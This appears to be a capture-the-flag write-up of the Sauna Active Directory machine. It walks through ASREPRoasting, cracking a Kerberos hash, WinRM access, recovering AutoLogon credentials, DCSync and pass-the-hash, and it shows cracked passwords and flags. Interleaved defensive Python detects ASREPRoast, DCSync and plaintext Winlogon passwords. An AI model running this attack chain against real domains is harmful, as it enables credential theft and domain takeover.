As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on them.
The following nmap command scans the target quickly for open ports and saves the output to a file:
-sS use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates.
-Pn assume the host is online (skip host discovery).
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Sat Apr 1 12:34:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.051s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49689/tcp open unknown
49698/tcp open unknown
# Nmap done at Sat Apr 1 12:35:21 2023 -- 1 IP address (1 host up) scanned in 39.58 seconds
Now that we know which ports are open, let's obtain the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Sat Apr 1 12:36:27 2023 as: nmap -sCV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 -Pn -n -oN targeted 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-01 17:36:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
| smb2-time:
| date: 2023-04-01T17:37:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 1 12:38:03 2023 -- 1 IP address (1 host up) scanned in 95.96 seconds
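The two scans above are worth turning into something reusable on the defensive side. The following Python is an added example, not code from this write-up or from nmap: it parses nmap's normal (-oN) output, pulls the hostname and domain out of the service banners, converts the clock-skew host-script result to seconds, and explains why this port profile identifies a domain controller. The port tables and the 5-minute Kerberos skew tolerance are assumptions built into the example; the sample input is the targeted scan output shown above.

```python
import re

# Constructed sample for this example: the "targeted" nmap -oN report from the
# scan above, reduced to the lines the parser uses.
SAMPLE_NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-01 17:36:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
DOMAIN_RE = re.compile(r"Domain:\s*(\S+?)0?\.?,")  # nmap prints "EGOTISTICAL-BANK.LOCAL0.," here
HOST_RE = re.compile(r"Service Info: Host:\s*([^;]+)")
SKEW_RE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")

# Assumed port tables: services whose combined exposure fingerprints a domain
# controller, and remote-management services worth calling out separately.
DC_PORTS = {88: "kerberos", 389: "ldap", 464: "kpasswd", 636: "ldaps",
            3268: "global catalog", 3269: "global catalog (tls)", 9389: "adws"}
REMOTE_MGMT_PORTS = {5985: "winrm http", 5986: "winrm https", 3389: "rdp"}
KERBEROS_MAX_SKEW = 5 * 60  # default Kerberos clock-skew tolerance, in seconds


def parse_nmap_normal(text):
    """Return one dict per port line of an nmap -oN report."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version or ""})
    return ports


def extract_domain(ports):
    """Pull the AD domain name out of the LDAP version banner, if nmap saw one."""
    for p in ports:
        m = DOMAIN_RE.search(p["version"])
        if m:
            return m.group(1)
    return None


def extract_host(text):
    m = HOST_RE.search(text)
    return m.group(1).strip() if m else None


def clock_skew_seconds(text):
    """Parse the clock-skew host-script line into signed seconds (None if absent)."""
    m = SKEW_RE.search(text)
    if not m:
        return None
    sign, h, mi, s = m.groups()
    total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    return -total if sign else total


def assess(ports, skew_seconds=None):
    """Summarise what the open-port profile says about the host."""
    open_ports = {p["port"] for p in ports if p["state"] == "open"}
    findings = []
    if {88, 464} <= open_ports and open_ports & {389, 3268}:
        findings.append("likely domain controller: KDC, kpasswd and LDAP/GC are all exposed")
    for port in sorted(open_ports & set(REMOTE_MGMT_PORTS)):
        findings.append(f"remote management reachable on {port} ({REMOTE_MGMT_PORTS[port]})")
    if 445 in open_ports:
        findings.append("SMB on 445: confirm smb2-security-mode reports signing required")
    if skew_seconds is not None and abs(skew_seconds) > KERBEROS_MAX_SKEW:
        findings.append(f"clock skew of {skew_seconds}s exceeds the {KERBEROS_MAX_SKEW}s Kerberos "
                        "tolerance; Kerberos authentication fails until clocks are synchronised")
    return {"dc_ports": sorted(open_ports & set(DC_PORTS)), "findings": findings}


if __name__ == "__main__":
    ports = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print("host:", extract_host(SAMPLE_NMAP_OUTPUT), "domain:", extract_domain(ports))
    for finding in assess(ports, clock_skew_seconds(SAMPLE_NMAP_OUTPUT))["findings"]:
        print(" -", finding)
```

The clock-skew check is the one most people skip: the 7-hour offset nmap reports here is exactly what breaks Kerberos later in this write-up, when bloodhound-python falls back to NTLM with KRB_AP_ERR_SKEW, and on a production DC it would break every Kerberos client the same way.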
Let's start by enumerating the SMB service. As we can see, the domain is EGOTISTICAL-BANK.LOCAL.
Now that we know some valid usernames, put them into a users file and let's try to perform an ASREPRoast attack.
ASREPRoast attack: when an account does not require Kerberos pre-authentication, anyone can request a TGT for it without knowing its credentials. The AS-REP contains data encrypted with a key derived from the user's password hash, so it can be cracked offline.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:34fde6ec753968064ea0fd141da0995d$...
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:0d955097f63d940fcdd84389bb289a27$...
We get the hash of the fsmith user. Let's crack it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:07 DONE (2023-04-02 12:21) 0.1251g/s 1319Kp/s 1319Kc/s 1319KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
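From the defender's side, the attack above leaves two things to look for: the account setting that makes it possible, and the KDC events it generates. The following Python is an added example, not part of the original write-up: it audits userAccountControl values for the DONT_REQ_PREAUTH bit (0x400000, the flag the GetNPUsers output refers to) and scans Security event 4768 records for AS-REPs issued with pre-authentication type 0, which is exactly the ticket john cracks above (etype 0x17, RC4, the "$23$" in the hash). The account list, event lines and IP addresses are constructed for the example.

```python
from collections import Counter

# userAccountControl bits (Active Directory)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample of (sAMAccountName, userAccountControl) pairs, as an LDAP
# export of the domain's user objects would return them.
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("hsmith", 0x10200),
    ("fsmith", 0x410200),         # ... | DONT_REQ_PREAUTH: the roastable account
    ("svc_loanmgr", 0x10200),
    ("old_vendor", 0x410202),     # pre-auth disabled, but the account itself is disabled
]


def accounts_without_preauth(accounts, include_disabled=False):
    """Names of accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    hits = []
    for name, uac in accounts:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits


# Constructed sample of Security event 4768 (a Kerberos TGT was requested),
# flattened to key=value fields. PreAuthType 0 means the AS-REQ carried no
# pre-authentication; Status 0x0 means the KDC issued the AS-REP anyway, while
# 0x19 (KDC_ERR_PREAUTH_REQUIRED) means it refused. Encryption type 0x17 is RC4,
# 0x12 is AES256. 192.0.2.10 plays the attacker, 10.10.10.50 a normal workstation.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=fsmith IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=hsmith IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x19
EventID=4768 TargetUserName=Administrator IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x19
EventID=4768 TargetUserName=fsmith IpAddress=10.10.10.50 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=svc_loanmgr IpAddress=10.10.10.50 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
"""


def parse_events(text):
    """One dict per non-empty line of key=value pairs."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def roastable_as_reps(events):
    """AS-REPs the KDC handed out with no pre-auth: each one is crackable offline.
    Returns (user, source ip, encryption type) so RC4 tickets can be prioritised."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e.get("EventID") == "4768" and e.get("PreAuthType") == "0"
            and e.get("Status") == "0x0"]


def preauthless_probes_by_source(events, threshold=2):
    """Sources sending repeated AS-REQs without pre-auth, whether the KDC answered
    or refused: the pattern a sweep over a username list leaves behind."""
    counts = Counter(e["IpAddress"] for e in events
                     if e.get("EventID") == "4768" and e.get("PreAuthType") == "0")
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    events = parse_events(SAMPLE_4768)
    print("roastable AS-REPs:", roastable_as_reps(events))
    print("probing sources:", preauthless_probes_by_source(events))
```

The refused requests matter as much as the successful one: the "[-] ... doesn't have UF_DONT_REQUIRE_PREAUTH set" lines in the GetNPUsers output above each correspond to a 4768 with status 0x19, so a burst of those from one address is the sweep itself, not just its result.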
Now we have valid credentials for the fsmith user.
As seen above, the fsmith user seems to be a member of the Remote Management Users group, since it is possible to get a shell as that user via WinRM. Then we'll be able to grab the user flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> type \users\fsmith\desktop\user.txt
99bb03df1359aa92126e0ac4bb06e325
Privilege Escalation
If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tells us.
WinPEAS is a script that searches for possible privilege escalation paths on Windows hosts. You can download it from the official GitHub page:
Upload the binary to the system and execute it.
upload /home/alfa8sa/tools/privEsc/winPEASany.exe
.\winPEASany.exe
...
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
...
It found credentials for the svc_loanmanager user. That exact user does not exist, but there is an account with a very similar name, svc_loanmgr.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
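The Winlogon key winPEAS reads here is readable by any interactive user, which is why a low-privilege account could recover the password. The following Python is an added example, not from the write-up or from winPEAS: it parses the output of reg query for the Winlogon key, as collected from each host, and flags hosts that keep a plaintext DefaultPassword (as opposed to the LSA-secret storage that Sysinternals Autologon uses). The registry dumps are constructed and the password value is a placeholder, not the one found above.

```python
import re

# Constructed sample: what `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"`
# prints on a host configured the way winPEAS reported above. Password is a placeholder.
SAMPLE_WINLOGON = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    PLACEHOLDER-PASSWORD
    Shell    REG_SZ    explorer.exe
"""

# Constructed sample of a host that also auto-logs-on but stores the secret as an
# LSA secret (what Sysinternals Autologon does), so no DefaultPassword value exists.
SAMPLE_WINLOGON_LSA = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    KIOSK\kiosk
    Shell    REG_SZ    explorer.exe
"""

# "    <name>    <REG_type>    <data>" as printed by reg query
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")


def parse_reg_query(text):
    """Map value name -> data for one key's reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, _reg_type, data = m.groups()
            values[name] = data.strip()
    return values


def audit_winlogon(text):
    """Return (severity, message) findings for one host; an empty list means clean."""
    v = parse_reg_query(text)
    name, domain = v.get("DefaultUserName", ""), v.get("DefaultDomainName", "")
    user = name if ("\\" in name or not domain) else f"{domain}\\{name}"
    findings = []
    if v.get("DefaultPassword"):
        findings.append(("high",
                         f"plaintext DefaultPassword stored for {user}: the Winlogon key is readable by "
                         "any interactive user; remove the value and, if auto-logon is really required, "
                         "store the secret as an LSA secret instead"))
    if v.get("AutoAdminLogon") == "1":
        findings.append(("info",
                         f"AutoAdminLogon enabled for {user}: anyone with console access lands in that "
                         "session, so the account should hold no privileges beyond the kiosk role"))
    return findings


def audit_fleet(dumps):
    """dumps: hostname -> reg query output. Returns only the hosts with findings."""
    results = {}
    for host, text in dumps.items():
        findings = audit_winlogon(text)
        if findings:
            results[host] = findings
    return results


if __name__ == "__main__":
    for host, findings in audit_fleet({"sauna": SAMPLE_WINLOGON, "kiosk": SAMPLE_WINLOGON_LSA}).items():
        for severity, message in findings:
            print(f"[{severity}] {host}: {message}")
```

A second lesson from this box sits in the usernames: the auto-logon entry names svc_loanmanager while the real account is svc_loanmgr, and the password still works, so a password-reuse check between decommissioned and live service accounts belongs in the same audit.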
Now we need to find a way to escalate privileges to NT AUTHORITY\SYSTEM. As we are facing a domain controller, it would be helpful to collect BloodHound data with the bloodhound-python tool.
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S
Now, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then browse to localhost on port 4747 and log in with the username neo4j and password neo4j. You'll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set up earlier.
Then click the Upload Data button in the right-hand panel and select all the .json files.
Once all the .json files are uploaded, go to the Analysis section. There we'll see that the svc_loanmgr user has DCSync rights.
As we have that account's credentials, we can remotely dump the hashes of every user in the domain with secretsdump.
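DCSync is visible on the domain controller: every replication request is logged as Security event 4662 with the replication control-access-right GUIDs in its Properties field, and the requesting logon session can be joined to its 4624 record to recover the source address. The Python below is an added detection example, not part of this write-up or of BloodHound or Impacket: it flags any such request from a principal that is neither a DC computer account nor an allow-listed replicator (an Azure AD Connect service account, for instance). The 4662 and 4624 records, the non-DC addresses and the unrelated property GUID are constructed.

```python
# Control-access-right GUIDs that appear in a 4662 event's Properties field when
# a principal replicates directory data. A non-DC account exercising the first
# two together is the DCSync pattern.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
BOTH_REPL_GUIDS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed 4662 records ("An operation was performed on an object"). 4662 has no
# client address of its own, so SubjectLogonId is the join key to the 4624 logon.
SAMPLE_4662 = [
    # the DC's own replication, running as SYSTEM (logon id 0x3e7): expected
    {"SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x3e7", "AccessMask": "0x100", "Properties": BOTH_REPL_GUIDS},
    # a user account asking for the same rights over the network: DCSync
    {"SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x1a2b3c", "AccessMask": "0x100", "Properties": BOTH_REPL_GUIDS},
    # an ordinary read of some unrelated property (placeholder GUID): noise
    {"SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK",
     "SubjectLogonId": "0x4d5e6f", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-00000000ffff}"},
]

# Constructed 4624 records keyed by logon id; 192.0.2.10 is the attacker's box.
SAMPLE_4624 = {
    "0x3e7": {"IpAddress": "-", "LogonType": "0"},
    "0x1a2b3c": {"IpAddress": "192.0.2.10", "LogonType": "3"},
    "0x4d5e6f": {"IpAddress": "10.10.10.50", "LogonType": "3"},
}


def replication_rights_used(properties):
    """Names of replication rights whose GUIDs appear in a Properties field."""
    props = properties.lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def detect_dcsync(events_4662, logons_4624, dc_accounts, allowlist=frozenset()):
    """Flag replication operations by any principal that is not a DC computer
    account or an explicitly allowed replicator, enriched with the source address
    and logon type from the matching 4624 record."""
    alerts = []
    for e in events_4662:
        rights = replication_rights_used(e.get("Properties", ""))
        if not rights:
            continue
        who = e["SubjectUserName"]
        if who in dc_accounts or who in allowlist:
            continue
        logon = logons_4624.get(e.get("SubjectLogonId"), {})
        alerts.append({
            "user": f"{e.get('SubjectDomainName', '')}\\{who}",
            "rights": rights,
            "source_ip": logon.get("IpAddress", "unknown"),
            "logon_type": logon.get("LogonType"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_4662, SAMPLE_4624, dc_accounts={"SAUNA$"}):
        print(f"DCSync by {alert['user']} from {alert['source_ip']} "
              f"(logon type {alert['logon_type']}): {', '.join(alert['rights'])}")
```

The DC account set should come from the Domain Controllers OU rather than being typed in, and the allow-list has to be maintained deliberately: the whole point of the BloodHound finding above is that svc_loanmgr holds these rights legitimately as far as the directory is concerned, so the ACL itself, not only the event, is the thing to fix.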
Now that we have the NTLM hash of the administrator, we can get a shell using Pass The Hash. Then, all we have to do is reap the harvest and take the root flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
6eaf06be24b9c3df464cdd242bf7ebb4